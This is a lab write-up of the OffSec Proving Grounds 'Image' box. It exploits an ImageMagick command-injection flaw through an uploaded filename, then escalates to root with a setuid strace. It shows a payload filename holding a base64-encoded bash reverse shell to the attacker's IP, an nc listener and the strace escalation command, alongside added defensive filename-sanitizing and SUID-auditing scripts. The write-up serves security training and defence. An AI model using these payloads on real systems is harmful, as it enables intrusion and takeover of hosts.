OSCP - Proving Grounds - Image
Key points
- Searching for public exploits
- SUID privilege escalation
Detailed steps
As usual, start with an nmap scan:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-17 22:57 UTC
Nmap scan report for 192.168.54.178
Host is up (0.00091s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: ImageMagick Identifier
|_http-server-header: Apache/2.4.41 (Ubuntu)
Port 80 is open. Visiting the site and uploading an image returns version information.
A quick search shows there is an RCE vulnerability, CVE-2023-34152:
💀 Exploit for OS Command Injection in Imagemagick CVE-2023-34152 CVE-2016-5118
Searching for a related exploit turns up https://github.com/overgrowncarrot1/ImageTragick_CVE-2023-34152
After downloading and running it, a payload file is generated:
C:\home\kali\Documents\OFFSEC\GoToWork\Image> python CVE-2023-34152.py -l 192.168.45.209 -p 80
C:\home\kali\Documents\OFFSEC\GoToWork\Image> ls -lrt
total 28
......
......
-rw-rw-r-- 1 kali kali 9 Oct 17 19:17 '|en"`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjIwOS84MCAwPiYxCg=='$'\n'' | base64 -d | bash`".png'
Run nc -nlvp 80 locally, then upload this payload file to get a reverse shell:
C:\home\kali\Documents\OFFSEC\GoToWork\Image> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.209] from (UNKNOWN) [192.168.164.178] 37486
bash: cannot set terminal process group (1169): Inappropriate ioctl for device
bash: no job control in this shell
www-data@image:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@image:/var/www/html$ cd ../
ls cd ../-l
www-data@image:/var/www$
ls -l
total 8
drwxr-xr-x 2 www-data www-data 4096 Aug 24 2023 html
-rw-r--r-- 1 www-data www-data 33 Oct 17 23:00 local.txt
www-data@image:/var/www$ cat local.txt
cat local.txt
fffab05d753809994c4a8765f0425163
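The injection above is carried entirely by the uploaded filename: the generated payload is a file whose name starts with "|" and embeds a shell command, and the identifier page hands that name to ImageMagick unchanged. The defensive fix on the application side is to never reuse a client-supplied filename on disk or in a command line. The following upload-handling check is an added example written for this write-up, not code from the target application or from the exploit repository; the allowed-extension policy, the function names and the sample filenames are assumptions constructed for the demonstration.

```python
import os
import re
import uuid

# Assumed upload policy for this example: only raster image extensions.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Characters that mean something to a shell or to ImageMagick's filename
# handling: a leading '|' opens a pipe, backticks and $(...) run subcommands,
# quotes and newlines are used to smuggle them past naive filters.
SHELL_META = re.compile(r'[|`$"\'\\;&<>(){}\[\]\r\n\x00]')


def is_suspicious_filename(name: str) -> bool:
    """True if a client-supplied filename should be treated as hostile
    (worth logging and alerting on, even though it is never used as-is)."""
    if not name or name.startswith("|"):
        return True
    if "/" in name or ".." in name:          # path traversal attempts
        return True
    return SHELL_META.search(name) is not None


def safe_stored_name(user_name: str) -> str:
    """Keep only a validated extension from the client's name and generate
    the rest server-side, so nothing attacker-controlled reaches ImageMagick."""
    ext = os.path.splitext(os.path.basename(user_name))[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"disallowed extension: {ext!r}")
    return f"{uuid.uuid4().hex}.{ext}"


def handle_upload(user_name: str) -> dict:
    """Decision record for one upload: whether the original name was flagged
    and the server-chosen name that the image tool is actually given."""
    flagged = is_suspicious_filename(user_name)
    return {"flagged": flagged, "stored_as": safe_stored_name(user_name)}


# Constructed sample filenames (not from the target): a benign upload, one
# shaped like the injection above (leading '|' plus a backtick subcommand),
# a traversal attempt and a disallowed extension.
SAMPLE_NAMES = [
    "holiday.JPG",
    "|x`y`.png",
    "../../etc/cron.d/x.png",
    "shell.php",
]

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        try:
            print(repr(n), "->", handle_upload(n))
        except ValueError as e:
            print(repr(n), "-> rejected:", e)
```

Flagged names are still stored (under the random name) so that legitimate users with odd filenames are not broken, but the flag should feed the application log; a burst of names beginning with "|" or containing backticks on an image endpoint is a clear indicator of this class of attack. Keeping ImageMagick patched remains the primary fix; the renaming only removes the filename as an injection vector.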
Look for SUID binaries; strace stands out as suspicious:
www-data@image:/tmp$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/strace
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/su
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chsh
GTFOBins lists a privilege escalation method for strace,
and the escalation succeeds:
www-data@image:/tmp$ /usr/bin/strace -o /dev/null /bin/bash -p
/usr/bin/strace -o /dev/null /bin/bash -p
bash-5.0# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
e7618c2af2adf61999717296bba72249
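The root cause of the escalation is a single non-standard setuid bit on /usr/bin/strace, which the find command above surfaces in seconds. On the defending side the same inventory can be compared against a baseline so that a stray SUID binary is caught before an attacker does. The auditor below is an added example written for this write-up, not code from the box or from GTFOBins; the baseline set is an assumed list of SUID binaries typical of a stock Ubuntu install and should be replaced with the golden image's real inventory, and BOX_SUID is copied from the find output above.

```python
import os
import stat

# Assumed baseline: SUID binaries a stock Ubuntu 20.04 image normally carries.
# Build this from a clean golden image rather than trusting this list.
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/fusermount", "/usr/bin/pkexec",
}

# Pseudo-filesystems that never hold real setuid files and slow the walk down.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def find_suid(root="/"):
    """Return the set of regular files under root with the setuid bit set.
    Equivalent to `find / -type f -perm -4000`; lstat so symlinks are not followed."""
    found = set()
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for f in filenames:
            p = os.path.join(dirpath, f)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(p)
    return found


def audit_suid(found, expected=EXPECTED_SUID):
    """Split a SUID inventory into binaries not in the baseline (investigate
    and strip the bit) and baseline entries absent from this host (informational)."""
    return {
        "unexpected": sorted(set(found) - expected),
        "missing": sorted(expected - set(found)),
    }


def remediation_commands(unexpected):
    """chmod lines an administrator reviews before applying."""
    return [f"chmod u-s {p}" for p in unexpected]


# SUID inventory copied from the find output on this box.
BOX_SUID = {
    "/usr/bin/strace", "/usr/bin/fusermount", "/usr/bin/sudo", "/usr/bin/su",
    "/usr/bin/umount", "/usr/bin/passwd", "/usr/bin/chsh",
}

if __name__ == "__main__":
    # Use BOX_SUID to reproduce the finding offline; swap in find_suid()
    # to audit the host the script runs on.
    report = audit_suid(BOX_SUID)
    print("unexpected:", report["unexpected"])
    print("missing from baseline:", report["missing"])
    for cmd in remediation_commands(report["unexpected"]):
        print("suggested:", cmd)
```

Run on this box the report lists /usr/bin/strace as the only unexpected entry, and the suggested `chmod u-s /usr/bin/strace` removes the escalation path entirely; strace has no legitimate need for setuid root. Scheduling the audit (cron, or as a file-integrity rule on the setuid bit) turns a one-off pentest finding into a standing control.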